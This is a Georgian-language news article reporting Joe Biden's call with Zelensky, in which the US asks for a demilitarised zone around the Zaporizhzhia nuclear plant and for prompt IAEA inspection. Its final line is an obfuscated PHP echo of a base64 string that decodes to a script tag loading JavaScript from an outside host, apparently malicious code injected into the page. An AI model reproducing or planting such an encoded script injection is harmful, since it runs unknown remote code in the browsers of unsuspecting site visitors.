celsiusi
ავერსი შნაიდერი
აშშ მოითხოვს, რომ ზაპოროჟიეს ატომური ელექტროსადგური და მისი ახლომდებარე ტერიტორია დემილიტარიზებულ ზონად გამოცხადდეს. ამის შესახებ ჯო ბაიდენმა უკრაინის პრეზიდენტთან სატელეფონო საუბრის დროს განაცხადა. როგორც თეთრი სახლის პრესსპიკერმა, კარინ ჟან პიერმა ჟურნალისტების კითხვებზე საპასუხოდ განაცხადა, ჯო ბაიდენმა ზელენსკის უთხრა, რომ ატომური სადგური არ უნდა გახდეს საომარი ზონა და ის უნდა დაბრუნდეს უკრაინის კონტროლქვეშ.
 
„როგორც ჩვენ უკვე განვაცხადეთ, რუსეთი უნდა დათანხმდეს ზაპოროჟიეს ატომური ელექტროსადგურის გარშემო დემილიტარიზებული ზონის შექმნას. ასევე დათანხმდეს ატომური ენერგიის საერთაშორისო სააგენტოს ინსპექტორების ატომურ სადგურზე რაც შეიძლება მალე ჩასვლას, რათა მათ სადგურის და სისტემის უსაფრთხოება გადაამოწმონ. ეს არის ის თემა, რომელიც ორი პრეზიდენტის საუბრის დროს იყო განხილული“, – განაცხადა თეთრი სახლის პრესსპიკერმა.
 
მისივე თქმით, ჯო ბაიდენმა ზელენსკის დამოუკიდებლობის დღე მოულოცა და უკრაინის სუვერენიტეტისა და ტერიტორიული მთლიანობის მხარდაჭერა კიდევ ერთხელ დაადასტურა.
434
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");